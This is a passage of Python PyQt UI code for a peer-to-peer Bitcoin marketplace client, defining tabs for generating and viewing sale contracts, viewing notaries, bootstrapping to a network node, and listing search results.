def __init__(self):
super(ContractGenUi2, self).__init__()
self.setObjectName(_fromUtf8("Form"))
self.resize(788, 376)
self.setAutoFillBackground(False)
self.gridLayoutWidget = QtGui.QWidget(self)
self.gridLayoutWidget.setGeometry(QtCore.QRect(10, 10, 671, 235))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.label = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("store_details_label"))
self.gridLayout.addWidget(self.label, 1, 0, 1, 1)
self.bitcoin_address_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.bitcoin_address_lineEdit.setObjectName(_fromUtf8("bitcoin_lineEdit"))
self.gridLayout.addWidget(self.bitcoin_address_lineEdit, 3, 1, 1, 1)
self.label_7 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_7.setFont(font)
self.label_7.setObjectName(_fromUtf8("nickname_label"))
self.gridLayout.addWidget(self.label_7, 6, 0, 1, 1)
self.price_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.price_lineEdit.setObjectName(_fromUtf8("guid_lineEdit"))
self.gridLayout.addWidget(self.price_lineEdit, 5, 1, 1, 1)
self.expiry_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.expiry_lineEdit.setObjectName(_fromUtf8("email_lineEdit"))
self.gridLayout.addWidget(self.expiry_lineEdit, 6, 1, 1, 1)
self.item_name_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.item_name_lineEdit.setObjectName(_fromUtf8("add_notary_line"))
self.gridLayout.addWidget(self.item_name_lineEdit, 4, 1, 1, 1)
self.label_6 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_6.setFont(font)
self.label_6.setObjectName(_fromUtf8("trusted_notaries_label"))
self.gridLayout.addWidget(self.label_6, 5, 0, 1, 1)
self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_4.setFont(font)
self.label_4.setObjectName(_fromUtf8("notary_details_label"))
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
self.label_5 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_5.setFont(font)
self.label_5.setObjectName(_fromUtf8("shipping_label"))
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setLayoutDirection(QtCore.Qt.RightToLeft)
self.label_2.setAutoFillBackground(False)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName(_fromUtf8("keys_label"))
self.gridLayout.addWidget(self.label_2, 2, 1, 1, 1)
self.generate_contract_button = QtGui.QPushButton(self)
self.generate_contract_button.setGeometry(QtCore.QRect(520, 260, 161, 27))
self.generate_contract_button.setObjectName(_fromUtf8("add_notary_label"))
##
# Add keywords
self.keywords_label = QtGui.QLabel(self.gridLayoutWidget)
self.keywords_label.setText("Add keywords")
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.keywords_label.setFont(font)
self.keywords_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.keywords_lineEdit.setText("Separate keywords by comma (ie word1,word2,word3,...,wordn)")
self.gridLayout.addWidget(self.keywords_label)
self.gridLayout.addWidget(self.keywords_lineEdit)
##
# Add pictures
self.browse_images_label = QtGui.QLabel(self.gridLayoutWidget)
self.browse_images_label.setText("Add images (max 3):")
self.browse_images_label.setFont(font)
self.images_button = QtGui.QPushButton(self.gridLayoutWidget)
self.images_button.setText("Browse...")
self.gridLayout.addWidget(self.browse_images_label)
self.gridLayout.addWidget(self.images_button)
self.images = list()
##
# Add a description
self.description_label = QtGui.QLabel(self.gridLayoutWidget)
self.description_label.setText("Item Description:")
self.description_label.setFont(font)
self.gridLayout.addWidget(self.description_label)
self.description_box = QtGui.QLineEdit(self.gridLayoutWidget)
self.gridLayout.addWidget(self.description_box)
##
# On clicked, generate the new contract data
# On clicked, find pictures
self.generate_contract_button.clicked.connect(self.generate_from_input)
self.images_button.clicked.connect(self.find_images)
self.label.setText(_translate("Form", "Contract Generator", None))
self.label_7.setText(_translate("Form", "Offer expiry date", None))
self.label_6.setText(_translate("Form", "Price (in BTC) of item to sell", None))
self.label_4.setText(_translate("Form", "Your Bitcoin address", None))
self.label_5.setText(_translate("Form", "Name of item to sell", None))
self.label_2.setText(_translate("Form", "Contract", None))
self.generate_contract_button.setText(_translate("Form", "Generate Contract", None))
##
# Creates a new contract using the fields in the UI
def generate_from_input(self):
contract = dict()
contract['expiry'] = str(self.expiry_lineEdit.text())
contract['price'] = str(self.price_lineEdit.text())
contract['bitcoin_address'] = str(self.bitcoin_address_lineEdit.text())
contract['item_name'] = str(self.item_name_lineEdit.text())
contract['keywords'] = str(self.keywords_lineEdit.text().split(','))
contract['description'] = str(self.description_box.text())
contract['images'] = self.images
self.window().id_module.new_contract(contract)
self.window().redraw()
##
# Browse and add images
# Saves the first three selected image paths to self.images (list)
def find_images(self):
self.images = QtGui.QFileDialog.getOpenFileNames(self, 'Add Images', '', '')[0:3]
if len(self.images) != 0:
self.images_button.setText(str(len(self.images)) + " selected")
else:
self.images_button.setText("Browse...")
##
# This class holds the UI for the Contract View Tab
class contractView_Tab(QtGui.QWidget):
##
# Constructor
# Creates the contract view tab
# @param ricardian_contract: ricardian contract being viewed in the tab
def __init__(self, ricardian_contract):
super(contractView_Tab, self).__init__()
self.contract_obj = ricardian_contract
self.setObjectName(_fromUtf8("Form"))
self.resize(1199, 1250)
self.gridLayoutWidget = QtGui.QWidget(self)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 570, 801, 231))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.descriptionTextBrowser = QtGui.QTextBrowser(self.gridLayoutWidget)
self.descriptionTextBrowser.setObjectName(_fromUtf8("descriptionTextBrowser"))
self.gridLayout.addWidget(self.descriptionTextBrowser, 0, 0, 1, 1)
self.verticalLayoutWidget = QtGui.QWidget(self)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 161, 181))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
self.label_2 = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout.addWidget(self.label_2)
self.label_3 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.verticalLayout.addWidget(self.label_3)
self.label_4 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.verticalLayout.addWidget(self.label_4)
self.verticalLayoutWidget_3 = QtGui.QWidget(self)
self.verticalLayoutWidget_3.setGeometry(QtCore.QRect(160, 0, 641, 181))
self.verticalLayoutWidget_3.setObjectName(_fromUtf8("verticalLayoutWidget_3"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.verticalLayoutWidget_3)
self.verticalLayout_3.setMargin(0)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.itemName = QtGui.QLabel(self.verticalLayoutWidget_3)
font = QtGui.QFont()
font.setPointSize(22)
self.itemName.setFont(font)
self.itemName.setText(_fromUtf8(""))
self.itemName.setObjectName(_fromUtf8("itemName"))
self.verticalLayout_3.addWidget(self.itemName)
self.price = QtGui.QLabel(self.verticalLayoutWidget_3)
font = QtGui.QFont()
font.setPointSize(18)
self.price.setFont(font)
self.price.setText(_fromUtf8(""))
self.price.setObjectName(_fromUtf8("price"))
self.verticalLayout_3.addWidget(self.price)
self.dateUploaded = QtGui.QLabel(self.verticalLayoutWidget_3)
self.dateUploaded.setText(_fromUtf8(""))
self.dateUploaded.setObjectName(_fromUtf8("dateUploaded"))
self.verticalLayout_3.addWidget(self.dateUploaded)
self.expires = QtGui.QLabel(self.verticalLayoutWidget_3)
self.expires.setText(_fromUtf8(""))
self.expires.setObjectName(_fromUtf8("expires"))
self.verticalLayout_3.addWidget(self.expires)
self.label_6 = QtGui.QLabel(self)
self.label_6.setGeometry(QtCore.QRect(0, 540, 91, 17))
self.label_6.setObjectName(_fromUtf8("label_6"))
self.horizontalLayoutWidget = QtGui.QWidget(self)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(0, 850, 801, 271))
self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
self.horizontalLayout = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout.setMargin(0)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.pictureOne = QtGui.QLabel(self.horizontalLayoutWidget)
self.pictureOne.setText(_fromUtf8(""))
self.pictureOne.setObjectName(_fromUtf8("pictureOne"))
self.horizontalLayout.addWidget(self.pictureOne)
self.pictureTwo = QtGui.QLabel(self.horizontalLayoutWidget)
self.pictureTwo.setText(_fromUtf8(""))
self.pictureTwo.setObjectName(_fromUtf8("pictureTwo"))
self.horizontalLayout.addWidget(self.pictureTwo)
self.pictureThree = QtGui.QLabel(self.horizontalLayoutWidget)
self.pictureThree.setText(_fromUtf8(""))
self.pictureThree.setObjectName(_fromUtf8("pictureThree"))
self.horizontalLayout.addWidget(self.pictureThree)
self.label_7 = QtGui.QLabel(self)
self.label_7.setGeometry(QtCore.QRect(0, 820, 66, 17))
self.label_7.setObjectName(_fromUtf8("label_7"))
self.label_8 = QtGui.QLabel(self)
self.label_8.setGeometry(QtCore.QRect(40, 1210, 121, 17))
self.label_8.setObjectName(_fromUtf8("label_8"))
self.desiredQuantitySpinBox = QtGui.QSpinBox(self)
self.desiredQuantitySpinBox.setGeometry(QtCore.QRect(170, 1200, 71, 31))
self.desiredQuantitySpinBox.setObjectName(_fromUtf8("desiredQuantitySpinBox"))
self.label_9 = QtGui.QLabel(self)
self.label_9.setGeometry(QtCore.QRect(250, 1210, 131, 17))
self.label_9.setObjectName(_fromUtf8("label_9"))
self.noteForMerchantLineEdit = QtGui.QLineEdit(self)
self.noteForMerchantLineEdit.setGeometry(QtCore.QRect(400, 1210, 321, 27))
self.noteForMerchantLineEdit.setObjectName(_fromUtf8("noteForMerchantLineEdit"))
self.purchaseButton = QtGui.QPushButton(self)
self.purchaseButton.setGeometry(QtCore.QRect(730, 1210, 98, 27))
self.purchaseButton.setObjectName(_fromUtf8("purchaseButton"))
self.sellerAvatar = QtGui.QLabel(self)
self.sellerAvatar.setGeometry(QtCore.QRect(990, 10, 201, 181))
self.sellerAvatar.setText(_fromUtf8(""))
self.sellerAvatar.setObjectName(_fromUtf8("sellerAvatar"))
self.label_15 = QtGui.QLabel(self)
self.label_15.setGeometry(QtCore.QRect(310, 1170, 81, 17))
self.label_15.setObjectName(_fromUtf8("label_15"))
self.keywords = QtGui.QLineEdit(self)
self.keywords.setGeometry(QtCore.QRect(400, 1170, 321, 27))
self.keywords.setObjectName(_fromUtf8("keywords"))
self.gridLayoutWidget_2 = QtGui.QWidget(self)
self.gridLayoutWidget_2.setGeometry(QtCore.QRect(0, 190, 801, 322))
self.gridLayoutWidget_2.setObjectName(_fromUtf8("gridLayoutWidget_2"))
self.gridLayout_2 = QtGui.QGridLayout(self.gridLayoutWidget_2)
self.gridLayout_2.setMargin(0)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.sellerName = QtGui.QLabel(self.gridLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(22)
self.sellerName.setFont(font)
self.sellerName.setText(_fromUtf8(""))
self.sellerName.setObjectName(_fromUtf8("sellerName"))
self.gridLayout_2.addWidget(self.sellerName, 0, 1, 1, 1)
self.bitcoinReceivingAddress = QtGui.QTextBrowser(self.gridLayoutWidget_2)
self.bitcoinReceivingAddress.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.bitcoinReceivingAddress.setObjectName(_fromUtf8("bitcoinReceivingAddress"))
self.gridLayout_2.addWidget(self.bitcoinReceivingAddress, 3, 1, 1, 1)
self.guid = QtGui.QTextBrowser(self.gridLayoutWidget_2)
self.guid.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.guid.setObjectName(_fromUtf8("guid"))
self.gridLayout_2.addWidget(self.guid, 2, 1, 1, 1)
self.sellerEmail = QtGui.QLabel(self.gridLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(18)
self.sellerEmail.setFont(font)
self.sellerEmail.setText(_fromUtf8(""))
self.sellerEmail.setObjectName(_fromUtf8("sellerEmail"))
self.gridLayout_2.addWidget(self.sellerEmail, 1, 1, 1, 1)
self.label_13 = QtGui.QLabel(self.gridLayoutWidget_2)
self.label_13.setObjectName(_fromUtf8("label_13"))
self.gridLayout_2.addWidget(self.label_13, 2, 0, 1, 1)
self.publicKey = QtGui.QTextBrowser(self.gridLayoutWidget_2)
self.publicKey.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.publicKey.setObjectName(_fromUtf8("publicKey"))
self.gridLayout_2.addWidget(self.publicKey, 4, 1, 1, 1)
self.label_11 = QtGui.QLabel(self.gridLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(18)
self.label_11.setFont(font)
self.label_11.setObjectName(_fromUtf8("label_11"))
self.gridLayout_2.addWidget(self.label_11, 1, 0, 1, 1)
self.label_10 = QtGui.QLabel(self.gridLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(22)
self.label_10.setFont(font)
self.label_10.setObjectName(_fromUtf8("label_10"))
self.gridLayout_2.addWidget(self.label_10, 0, 0, 1, 1)
self.label_12 = QtGui.QLabel(self.gridLayoutWidget_2)
self.label_12.setObjectName(_fromUtf8("label_12"))
self.gridLayout_2.addWidget(self.label_12, 3, 0, 1, 1)
self.label_14 = QtGui.QLabel(self.gridLayoutWidget_2)
self.label_14.setObjectName(_fromUtf8("label_14"))
self.gridLayout_2.addWidget(self.label_14, 4, 0, 1, 1)
self.label_5 = QtGui.QLabel(self)
self.label_5.setGeometry(QtCore.QRect(330, 1130, 66, 17))
self.label_5.setObjectName(_fromUtf8("label_5"))
self.ledger = QtGui.QLineEdit(self)
self.ledger.setGeometry(QtCore.QRect(400, 1130, 321, 27))
self.ledger.setObjectName(_fromUtf8("ledger"))
self.label.setText(_translate("Form", "Item Name:", None))
self.label_2.setText(_translate("Form", "Price:", None))
self.label_3.setText(_translate("Form", "Date Uploaded:", None))
self.label_4.setText(_translate("Form", "Expires:", None))
self.label_6.setText(_translate("Form", "Description: ", None))
self.label_7.setText(_translate("Form", "Pictures:", None))
self.label_8.setText(_translate("Form", "Desired Quantity:", None))
self.label_9.setText(_translate("Form", "Note for Merchant:", None))
self.purchaseButton.setText(_translate("Form", "Purchase", None))
self.label_15.setText(_translate("Form", "Keywords:", None))
self.bitcoinReceivingAddress.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfsdddddddddddddddddddddddddddddddddddddddddddddddddasdfasdfasdfasdfasdfasdfasdffdasdf</p></body></html>", None))
self.guid.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfsddddddddddddddddddddddddddddddddddddddddddddddddd</p></body></html>", None))
self.label_13.setText(_translate("Form", "GUID:", None))
self.publicKey.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfsddddddddddddddddddddddddddddddddddddddddddddddddd</p></body></html>", None))
self.label_11.setText(_translate("Form", "Seller Email:", None))
self.label_10.setText(_translate("Form", "Seller Name:", None))
self.label_12.setText(_translate("Form", "Bitcoin Receiving Address:", None))
self.label_14.setText(_translate("Form", "Public Key:", None))
self.label_5.setText(_translate("Form", "Ledger:", None))
meta = ricardian_contract.get_module('metadata')
id = ricardian_contract.get_module('id')
trade = ricardian_contract.get_module('trade')
ledger = ricardian_contract.get_module('ledger')
##
# Set values from the trade module
self.itemName.setText(trade['name'])
self.price.setText(trade['price'])
self.descriptionTextBrowser.setText(trade['description'])
self.keywords.setText(', '.join(trade['keywords']))
for count, image_store in enumerate(trade['images']):
if count == 0:
self.pictureOne.setPixmap(image_store.get_repr().toqpixmap())
self.pictureOne.setScaledContents(True)
elif count == 1:
self.pictureTwo.setPixmap(image_store.get_repr().toqpixmap())
self.pictureTwo.setScaledContents(True)
elif count == 2:
self.pictureThree.setPixmap(image_store.get_repr().toqpixmap())
self.pictureThree.setScaledContents(True)
##
# Set values from the metadata module
self.dateUploaded.setText(meta['date'])
self.expires.setText(meta['expiry'])
##
# Set values from the seller module
#self.bitcoinRecevingAddress.setText(id['seller']['bitcoinReceivingAddress'])
self.sellerName.setText(id['seller']['nickname'])
self.sellerEmail.setText(id['seller']['email'])
self.guid.setText(id['seller']['guid'])
self.publicKey.setText(id['seller']['pubkey'])
avatar_pm = id['seller']['avatar'].get_repr().toqpixmap()
self.sellerAvatar.setPixmap(avatar_pm)
self.sellerAvatar.setScaledContents(True)
self.purchaseButton.clicked.connect(self.purchase_contract)
##
# Defines action to be taken when purchaseButton is clicked
def purchase_contract(self):
self.window().id_module.make_purchase(self.contract_obj)
self.window().redraw()
##
# This class holds the view for a notary
class notaryViewTab(QtGui.QWidget):
##
# Constructor
# Creates the Notary View Tab
def __init__(self, notary_repr_obj):
super(notaryViewTab, self).__init__()
self.setObjectName(_fromUtf8("Form"))
self.resize(941, 527)
self.label_11 = QtGui.QLabel(self)
self.label_11.setGeometry(QtCore.QRect(540, 6, 231, 211))
self.label_11.setText(_fromUtf8(""))
self.label_11.setObjectName(_fromUtf8("label_11"))
self.gridLayoutWidget = QtGui.QWidget(self)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 10, 771, 452))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.GUID = QtGui.QTextEdit(self.gridLayoutWidget)
self.GUID.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.GUID.setObjectName(_fromUtf8("GUID"))
self.gridLayout.addWidget(self.GUID, 2, 1, 1, 1)
self.publicKey = QtGui.QTextEdit(self.gridLayoutWidget)
self.publicKey.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.publicKey.setObjectName(_fromUtf8("publicKey"))
self.gridLayout.addWidget(self.publicKey, 3, 1, 1, 1)
self.bitcoinReceivingAddress = QtGui.QTextEdit(self.gridLayoutWidget)
self.bitcoinReceivingAddress.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.bitcoinReceivingAddress.setObjectName(_fromUtf8("bitcoinReceivingAddress"))
self.gridLayout.addWidget(self.bitcoinReceivingAddress, 4, 1, 1, 1)
self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
self.label_7 = QtGui.QLabel(self.gridLayoutWidget)
self.label_7.setObjectName(_fromUtf8("label_7"))
self.gridLayout.addWidget(self.label_7, 5, 0, 1, 1)
self.storeEmail = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.storeEmail.setFont(font)
self.storeEmail.setText(_fromUtf8(""))
self.storeEmail.setObjectName(_fromUtf8("storeEmail"))
self.gridLayout.addWidget(self.storeEmail, 1, 1, 1, 1)
self.storeName = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.storeName.setFont(font)
self.storeName.setText(_fromUtf8(""))
self.storeName.setObjectName(_fromUtf8("storeName"))
self.gridLayout.addWidget(self.storeName, 0, 1, 1, 1)
self.label = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.label_3 = QtGui.QLabel(self.gridLayoutWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
self.label_5 = QtGui.QLabel(self.gridLayoutWidget)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.fee = QtGui.QLabel(self.gridLayoutWidget)
self.fee.setText(_fromUtf8(""))
self.fee.setObjectName(_fromUtf8("fee"))
self.gridLayout.addWidget(self.fee, 5, 1, 1, 1)
self.label_9 = QtGui.QLabel(self.gridLayoutWidget)
self.label_9.setObjectName(_fromUtf8("label_9"))
self.gridLayout.addWidget(self.label_9, 6, 0, 1, 1)
self.description = QtGui.QTextEdit(self.gridLayoutWidget)
self.description.setObjectName(_fromUtf8("description"))
self.gridLayout.addWidget(self.description, 6, 1, 1, 1)
self.label_8 = QtGui.QLabel(self)
self.label_8.setGeometry(QtCore.QRect(800, 20, 221, 211))
self.label_8.setText(_fromUtf8(""))
self.label_8.setObjectName(_fromUtf8("label_8"))
self.avatar = QtGui.QLabel(self)
self.avatar.setGeometry(QtCore.QRect(780, 20, 151, 141))
self.avatar.setText(_fromUtf8(""))
self.avatar.setObjectName(_fromUtf8("avatar"))
self.setWindowTitle(_translate("Form", "Form", None))
self.GUID.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfasdfasdfasdfasdfasdfasdfasdfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffasddfasdasdfasdfasdfasdffasdf</p></body></html>", None))
self.publicKey.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdasdfadfasdfasdfasdfasdfasdfasdffsdsdfffffffffffffffffffffffasdasdfasdfasdfasdfasdfasdfasdfasdasdf</p></body></html>", None))
self.bitcoinReceivingAddress.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfadsfadfasdfasdfasdfasfasdfasfdfsdadsfsdfdfsafdsadfsdfsadsfdafsadfsdasdasdfadsfasdfasdfasdfasdassadfasdfasdfasdfasdfasfdasdfdsaf</p></body></html>", None))
self.label_4.setText(_translate("Form", "Public Key:", None))
self.label_7.setText(_translate("Form", "Fee (%):", None))
self.label.setText(_translate("Form", "User Name:", None))
self.label_3.setText(_translate("Form", "GUID:", None))
self.label_5.setText(_translate("Form", "Bitcoin Receiving Address:", None))
self.label_2.setText(_translate("Form", "User Email:", None))
self.label_9.setText(_translate("Form", "Description", None))
notary_repr = notary_repr_obj.get()
self.bitcoinReceivingAddress.setText(notary_repr['bitcoinReceivingAddress'])
self.avatar.setPixmap(notary_repr['avatar'].get_repr().toqpixmap())
self.avatar.setScaledContents(True)
self.description.setText(notary_repr['description'])
self.fee.setText(notary_repr['fee'])
self.GUID.setText(notary_repr['guid'])
self.storeEmail.setText(notary_repr['email'])
self.publicKey.setText(notary_repr['pubkey'])
self.storeName.setText(notary_repr['name'])
##
# bootStrap_Tab
# This class holds the UI for the bootstrap tab
class bootStrap_Tab(QtGui.QWidget):
##
# Constructor
# Creates the bootstrap tab
def __init__(self):
super(bootStrap_Tab, self).__init__()
self.setObjectName(_fromUtf8("OrdersMenu"))
self.resize(400, 300)
self.pushButton = QtGui.QPushButton(self)
self.pushButton.setGeometry(QtCore.QRect(70, 180, 98, 27))
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.ip_lineEdit = QtGui.QLineEdit(self)
self.ip_lineEdit.setGeometry(QtCore.QRect(50, 70, 161, 27))
self.ip_lineEdit.setObjectName(_fromUtf8("ip_lineEdit"))
self.port_lineEdit = QtGui.QLineEdit(self)
self.port_lineEdit.setGeometry(QtCore.QRect(50, 120, 161, 27))
self.port_lineEdit.setObjectName(_fromUtf8("port_lineEdit"))
self.setWindowTitle(_translate("OrdersMenu", "Form", None))
self.pushButton.setText(_translate("OrdersMenu", "Bootstrap", None))
self.ip_lineEdit.setText(_translate("OrdersMenu", "Enter IP Address", None))
self.port_lineEdit.setText(_translate("OrdersMenu", "Enter Port Number", None))
##
# On clicked, generate the bootstrap
self.pushButton.clicked.connect(self.initiate_bootstrap)
##
# Attempts to bootstrap the node module to the network using the fields in the tab
def initiate_bootstrap(self):
self.window().node.attempt_bootstrap(str(self.ip_lineEdit.text()), int(self.port_lineEdit.text()))
##
# This class is a view for the results of an OpenBazaar search
class SearchResultsWidget(QtGui.QWidget):
def __init__(self, search, list_of_contracts):
super(SearchResultsWidget, self).__init__()
##
# Save the list of contracts, so when one is selected we can draw the contract
# view using it's data
self.contracts_found = list_of_contracts
self.setObjectName(_fromUtf8("search_results_widget"))
self.resize(748, 568)
self.verticalLayoutWidget = QtGui.QWidget(self)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 751, 571))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.search_results_label = QtGui.QLabel(self.verticalLayoutWidget)
self.search_query_label = QtGui.QLabel(self.verticalLayoutWidget)
header_font = QtGui.QFont()
header_font.setFamily(_fromUtf8("Latin Modern Sans"))
header_font.setPointSize(36)
self.search_query_label.setFont(header_font)
header_font.setUnderline(True)
self.search_results_label.setFont(header_font)
self.search_results_label.setObjectName(_fromUtf8("search_results_label"))
self.verticalLayout.addWidget(self.search_results_label)
self.verticalLayout.addWidget(self.search_query_label)
self.results_list = QtGui.QListWidget(self.verticalLayoutWidget)
self.results_list.setObjectName(_fromUtf8("results_list"))
##
# Add all search results to the list
#
item_font = QtGui.QFont()
item_font.setPointSize(16)
for contract in self.contracts_found:
item = QtGui.QListWidgetItem()
item.setFont(item_font)
item.setText(contract.get_itemname())
item.setData(QtCore.Qt.UserRole, contract)
self.results_list.addItem(item)
